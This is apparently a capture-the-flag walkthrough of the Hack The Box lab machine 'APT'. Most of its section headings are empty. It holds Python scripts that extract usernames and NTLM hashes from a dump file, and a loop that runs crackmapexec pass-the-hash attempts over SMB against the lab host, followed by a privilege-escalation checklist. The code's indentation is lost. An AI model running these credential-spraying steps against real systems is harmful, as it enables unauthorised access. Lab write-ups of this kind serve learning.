Hack The Box — APT

What we will do ?

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

1. Information Gathering

2. Scanning

#Get all usernames in separated file names = []
with open("hashes.txt", "r") as lines:
for line in lines:
name = line.split(":")[0]
names.append(name)
new_names = []
for line in names:
if line not in new_names:
new_names.append(line)
for line in new_names:
print line
#Get all hashes
with open("hashes.txt", "r") as lines:
for line in lines:
pass_hash = line.split(":")
first = pass_hash[3]
second = pass_hash[2]
if first:
print first
else:
print second
import subprocess
users = ["henry.vinson", "APT$", "Administrator"]
with open("hashed_passwords.txt","r") as hashes:
i = 0
user = users[0]
for hhash in hashes:
user = users[i]
print("[====[" + user + "]====]")
subprocess.call("crackmapexec --verbose smb apt.htb -u " + user + " -H " + hhash, shell=True)
i = i + 1

3. Gaining Access

4. Maintaining Access

  1. Enumerate the directories and files for any leaked data
  2. Use Exploit-Suggester tools to discover the kernel vulnerabilities
  3. Use automation tools to perform multiple tasks like linPEAS or linenum
  4. Use PsPy to listen for the executed processes to watch and note if there’s any process can lead me to the root flag

Congrats ❤

Stay in touch

--

--

--

Offensive Security Enthusiast — twitter @eslam3kll

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Eslam Akl

Eslam Akl

Offensive Security Enthusiast — twitter @eslam3kll

More from Medium

TRYHACKME “ROOTME” walkthrough

Web site image

HackMyVM — Corrosion3

Authentication Basic in 3 minutes

LFI | TryHackMe (THM)